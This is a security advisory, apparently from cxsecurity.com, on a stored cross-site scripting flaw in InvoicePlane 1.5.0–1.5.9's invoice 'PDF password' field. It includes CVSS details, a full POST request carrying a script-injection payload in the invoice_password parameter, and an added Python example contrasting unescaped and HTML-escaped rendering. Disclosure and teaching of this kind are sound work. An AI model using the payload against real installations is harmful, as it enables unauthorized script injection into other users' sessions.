InvoicePlane 1.5.0 "PDF password" parameter Stored XSS (v1.5.0 to 1.5.9)

2019.02.18
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 3.5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 6.8/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Single time
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

POC:

A Stored Cross-site scripting (XSS) vulnerability was discovered in the InvoicePlane application, versions v1.5.0 to v1.5.9 (https://github.com/InvoicePlane/InvoicePlane).

After logging into the InvoicePlane application, browse to the "view invoices" option available at https://demo.invoiceplane.com/index.php/invoices/status/all and select any invoice for demonstration, e.g. https://demo.invoiceplane.com/index.php/invoices/view/27. In this invoice page, inject a JavaScript payload into the "PDF password" parameter input. The injected JS payload is sent to the server as POST parameter data in the "invoice_password" POST field.

Below is the POST request to the InvoicePlane application that triggers the Stored XSS (the invoice_password parameter is vulnerable to Stored XSS):

POST /index.php/invoices/ajax/save HTTP/1.1
Host: demo.invoiceplane.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.invoiceplane.com/index.php/invoices/view/32
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 786
Cookie: ip_csrf_cookie=e6daab2293247ef975dc1e2bf621716e; ip_session=ki8khmtnpv7t3jkcj0q6dvsjm46oa6va
Connection: close

invoice_id=32&
invoice_number=INV-19-0032&
invoice_date_created=01%2F30%2F2019&
invoice_date_due=03%2F01%2F2019&
invoice_status_id=1&
invoice_password=tester"><script>alert("StoredXSS")</script>&
items=%5B%7B%22invoice_id%22%3A%2232%22%2C%22item_id%22%3A%22%22%2C%22item_product_id%22%3A%22%22%2C%22item_task_id%22%3A%22%22%2C%22item_name%22%3A%22%22%2C%22item_quantity%22%3A%22%22%2C%22item_price%22%3A%22%22%2C%22item_discount_amount%22%3A%22%22%2C%22item_tax_rate_id%22%3A%220%22%2C%22item_description%22%3A%22%22%2C%22item_product_unit_id%22%3A%220%22%2C%22item_order%22%3A1%7D%5D&
invoice_discount_amount=&
invoice_discount_percent=&
invoice_terms=&
custom%5B0%5D%5Bname%5D=custom%5B3%5D&
custom%5B0%5D%5Bvalue%5D=&
payment_method=0&
_ip_csrf=e6daab2293247ef975dc1e2bf621716e
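The root cause is the stored "invoice_password" value being echoed back into an HTML attribute without output encoding, so the `">` in the payload closes the attribute and the tag. The following is an added illustration of that pattern and its fix (not InvoicePlane's own PHP code; the render functions are hypothetical stand-ins for the view that prints the field), using Python's HTML parser to show what a browser would build from each rendering:

```python
# Added example, not InvoicePlane code: the same field rendered unsafely and
# safely, then parsed to show which tags a browser-like parser would create.
import html
from html.parser import HTMLParser

# The invoice_password value from the advisory's POST request.
PAYLOAD = 'tester"><script>alert("StoredXSS")</script>'


def render_unsafe(invoice_password: str) -> str:
    """Vulnerable pattern: stored value echoed into an attribute unencoded."""
    return f'<input type="text" name="invoice_password" value="{invoice_password}">'


def render_safe(invoice_password: str) -> str:
    """Hardened pattern: HTML-encode for the attribute context.
    html.escape(quote=True) also encodes the double quote the payload needs."""
    return f'<input type="text" name="invoice_password" value="{html.escape(invoice_password)}">'


class TagCollector(HTMLParser):
    """Records every start tag seen and the value attribute of each <input>."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.values: list[str | None] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            # html.parser decodes entities in attribute values, as a browser does.
            self.values.append(dict(attrs).get("value"))


def parse(markup: str) -> TagCollector:
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        parsed = parse(render(PAYLOAD))
        print(f"{label}: tags={parsed.tags} values={parsed.values}")
```

In the unsafe rendering the parser sees a second element, `script`, and the stored value is truncated to "tester"; in the safe rendering only the `input` element exists and the full string survives as inert attribute text.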

References:

https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OTG-INPVAL-002)
https://www.acunetix.com/websitesecurity/xss/


Copyright 2019, cxsecurity.com